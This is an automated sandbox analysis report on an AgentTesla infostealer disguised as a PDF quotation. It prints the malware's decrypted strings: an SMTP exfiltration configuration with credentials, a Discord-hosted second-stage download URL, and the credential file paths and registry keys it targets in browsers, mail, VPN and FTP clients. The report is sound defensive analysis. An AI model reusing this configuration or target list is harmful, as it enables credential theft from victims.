Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe

Overview

General Information

Sample Name:QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
Original Sample Name:QUOTATION_SEPT9FIBA00541PDF.scr.exe
Analysis ID:1310965
MD5:a4be5e5c00ec493498b67ae5c2fd2d04
SHA1:1c197e31fb8fde59cdd69d2f69e13dde8db55413
SHA256:1b1c9bbe9504df699338d7e0f95579db33ae5aa611eb55559d05b116b8c80a84
Tags:exescr
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Antivirus / Scanner detection for submitted sample
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected Costura Assembly Loader
Contains functionality to log keystrokes (.Net Source)
Machine Learning detection for sample
Allocates memory in foreign processes
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Uses ipconfig to lookup or modify the Windows network settings
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

  • System is w10x64
  • QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe (PID: 5436 cmdline: C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe MD5: A4BE5E5C00EC493498B67AE5C2FD2D04)
    • cmd.exe (PID: 2912 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • ipconfig.exe (PID: 6320 cmdline: ipconfig /release MD5: B0C7423D02A007461C850CD0DFE09318)
    • cmd.exe (PID: 6088 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • ipconfig.exe (PID: 3052 cmdline: ipconfig /renew MD5: B0C7423D02A007461C850CD0DFE09318)
    • AppLaunch.exe (PID: 3928 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe MD5: 4DF5F963C7E18F062E49870D0AFF8F6F)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Host": "smtp.yandex.com", "Username": "frankneymars42@yandex.com", "Password": "uikstcmljdzhturh"}
SourceRuleDescriptionAuthorStrings
00000000.00000002.383516213.000000000352F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000000.00000002.383516213.0000000003533000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000000.00000002.383676188.00000000043D0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
        00000000.00000002.383516213.0000000003351000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          00000000.00000002.383893924.0000000005B60000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            Click to see the 8 entries
            SourceRuleDescriptionAuthorStrings
            0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.4524220.7.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.44e434d.10.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.44767c0.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.44e434d.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                    0.2.QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe.44c432d.11.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                      Click to see the 6 entries
                      No Sigma rule has matched
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 11.2.AppLaunch.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "smtp.yandex.com", "Username": "frankneymars42@yandex.com", "Password": "uikstcmljdzhturh"}
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeReversingLabs: Detection: 47%
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeAvira: detected
                      Source: QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exeJoe Sandbox ML: detected
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: /log.tmp
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <br>[
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ]<br>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <br>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Time:
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <br>User Name:
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <br>Computer Name:
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <br>OSFullName:
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <br>CPU:
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <br>RAM:
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <br>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: IP Address:
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <br>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <hr>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: New
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: IP Address:
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: false
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: true
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: false
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: true
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: false
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: false
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: false
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: true
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: false
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: smtp.yandex.com
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: frankneymars42@yandex.com
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: uikstcmljdzhturh
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: frankneymars42@yandex.com
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: true
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: false
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: false
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: appdata
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: cGwIUTI
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: cGwIUTI.exe
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: cGwIUTI
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Type
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: http://cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \donexx.exe
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \donexx.exe
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <br>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <hr>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <br>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <b>[
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ]</b> (
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: )<br>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {BACK}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {ALT+TAB}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {ALT+F4}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {TAB}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {ESC}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {Win}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {CAPSLOCK}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {KEYUP}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {KEYDOWN}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {KEYLEFT}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {KEYRIGHT}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {DEL}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {END}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {HOME}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {Insert}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {NumLock}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {PageDown}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {PageUp}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {ENTER}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {F1}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {F2}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {F3}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {F4}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {F5}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {F6}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {F7}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {F8}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {F9}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {F10}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {F11}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {F12}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: control
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {CTRL}
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: &amp;
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: &lt;
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: &gt;
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: &quot;
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <br><hr>Copied Text: <br>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <hr>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: logins
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: IE/Edge
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Windows Secure Note
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Windows Web Password Credential
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Windows Credential Picker Protector
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Web Credentials
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Windows Credentials
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Windows Domain Certificate Credential
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Windows Domain Password Credential
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Windows Extended Credential
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SchemaId
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: pResourceElement
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: pIdentityElement
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: pPackageSid
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: pAuthenticatorElement
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: IE/Edge
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: UC Browser
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: UCBrowser\
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Login Data
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: journal
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: wow_logins
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Safari for Windows
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <array>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <dict>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <string>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: </string>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <string>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: </string>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <data>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: </data>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: -convert xml1 -s -o "
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \fixed_keychain.xml"
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Microsoft\Credentials\
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Microsoft\Credentials\
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Microsoft\Credentials\
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Microsoft\Credentials\
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Microsoft\Protect\
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: credential
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: QQ Browser
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Tencent\QQBrowser\User Data
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Default\EncryptedStorage
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Profile
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \EncryptedStorage
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: entries
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: category
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: str3
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: str2
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: blob0
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: password_value
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: IncrediMail
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: PopPassword
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SmtpPassword
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Software\IncrediMail\Identities\
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Accounts_New
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: PopPassword
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SmtpPassword
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SmtpServer
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: EmailAddress
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Eudora
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: current
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Settings
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SavePasswordText
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Settings
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ReturnAddress
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Falkon Browser
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \falkon\profiles\
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: profiles.ini
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: profiles.ini
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \browsedata.db
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: autofill
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ClawsMail
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Claws-mail
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \clawsrc
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \clawsrc
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: passkey0
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: master_passphrase_salt=(.+)
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \accountrc
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: smtp_server
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: address
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: account
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \passwordstorerc
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: {(.*),(.*)}(.*)
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Flock Browser
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: APPDATA
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Flock\Browser\
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: signons3.txt
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: DynDns
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ALLUSERSPROFILE
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Dyn\Updater\config.dyndns
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: username=
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: password=
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: https://account.dyn.com/
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: t6KzXhCh
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ALLUSERSPROFILE
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Dyn\Updater\daemon.cfg
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: global
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: accounts
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: account.
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: username
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: account.
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Psi/Psi+
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: name
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Psi/Psi+
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: APPDATA
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Psi\profiles
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: APPDATA
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Psi+\profiles
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \accounts.xml
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \accounts.xml
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: OpenVPN
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Software\OpenVPN-GUI\configs
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Software\OpenVPN-GUI\configs
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Software\OpenVPN-GUI\configs\
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: username
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: auth-data
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: entropy
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: USERPROFILE
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \OpenVPN\config\
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: remote
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: remote
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: NordVPN
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: NordVPN
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: NordVpn.exe*
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: user.config
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: //setting[@name='Username']/value
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: //setting[@name='Password']/value
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: NordVPN
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Private Internet Access
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: %ProgramW6432%
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Private Internet Access\data
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: ProgramFiles(x86)
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \Private Internet Access\data
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \account.json
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: .*"username":"(.*?)"
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: .*"password":"(.*?)"
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Private Internet Access
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: privateinternetaccess.com
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: FileZilla
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: APPDATA
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \FileZilla\recentservers.xml
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: APPDATA
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: \FileZilla\recentservers.xml
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <Server>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <Host>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <Host>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: </Host>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <Port>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: </Port>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <User>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <User>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: </User>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <Pass encoding="base64">
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <Pass encoding="base64">
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: </Pass>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <Pass>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: <Pass encoding="base64">
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: </Pass>
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: CoreFTP
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SOFTWARE\FTPWare\COREFTP\Sites
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: User
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Host
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Port
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: hdfzpysvpzimorhk
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: WinSCP
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: HostName
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: UserName
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: Password
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: PublicKeyFile
                      Source: 11.2.AppLaunch.exe.400000.0.unpackString decryptor: PortNumber
